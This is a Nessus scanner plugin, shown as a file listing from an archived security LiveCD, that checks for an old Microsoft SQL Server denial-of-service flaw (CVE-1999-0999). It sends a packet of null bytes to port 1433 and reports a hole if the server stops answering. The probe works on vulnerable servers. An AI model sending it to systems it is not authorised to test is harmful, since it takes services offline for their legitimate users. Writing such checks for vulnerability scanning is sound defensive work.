home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / mssqlserver_dos.nasl < prev    next >
Text File  |  2005-01-14  |  1KB  |  60 lines

  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10145);
  10.  script_bugtraq_id(817);
  11.  script_version ("$Revision: 1.10 $");
  12.  script_cve_id("CVE-1999-0999");
  13.  name["english"] = "Microsoft's SQL TCP/IP denial of service";
  14.  script_name(english:name["english"]);
  15.  
  16.  desc["english"] = "
  17. The remote Microsoft SQL server can be shut down when it is
  18. sent a TCP packet containing more than 2 NULLs.
  19.  
  20. An attacker may use this problem to prevent it from
  21. being used by legitimate clients, thus threatening
  22. your business.
  23.  
  24. Solution : filter incoming connections to port 1433
  25. Risk factor : High";
  26.  
  27.  script_description(english:desc["english"]);
  28.  
  29.  summary["english"] = "Microsoft's SQL TCP/IP DoS";
  30.  script_summary(english:summary["english"]);
  31.  
  32.  script_category(ACT_DENIAL);
  33.  
  34.  script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison");
  35.  family["english"] = "Denial of Service";
  36.  script_family(english:family["english"]);
  37.  script_require_ports("Services/mssql", 1433);
  38.  script_dependencie("mssqlserver_detect.nasl");
  39.  exit(0);
  40. }
  41.  
  42. #
  43. # The script code starts here
  44. #
  45.  
  46. if (get_port_state(1433))
  47. {
  48.  soc = open_sock_tcp(1433);
  49.  if (soc)
  50.  {
  51.   data = raw_string(0x00, 0x00, 0x00, 0x00, 0x00, 0x00);
  52.   send(socket:soc, data:data);
  53.   close(soc);
  54.   sleep(2);
  55.   soc2 = open_sock_tcp(1433);
  56.   if(!soc2)security_hole(1433);
  57.   else close(soc2);
  58.  }
  59. }
  60.